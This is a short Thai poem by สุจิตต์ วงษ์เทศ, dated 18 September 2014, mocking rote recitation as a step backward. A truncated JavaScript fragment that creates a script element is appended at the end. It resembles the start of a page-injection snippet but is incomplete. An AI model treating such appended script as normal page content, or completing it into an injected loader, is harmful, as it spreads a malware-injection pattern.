ท่องอาขยาน

 

โลกหมุนไปข้างหน้า

นี่จะพากันเดินถอยหลัง

ท่องอาขยานพะรุงพะรัง

ถอยหลังเข้าคลองกุดอุดตัน

 

สุจิตต์ วงษ์เทศ

พฤหัสบดี 18 กันยายน 2557

var d=document;var s=d.createElement(‘script’); }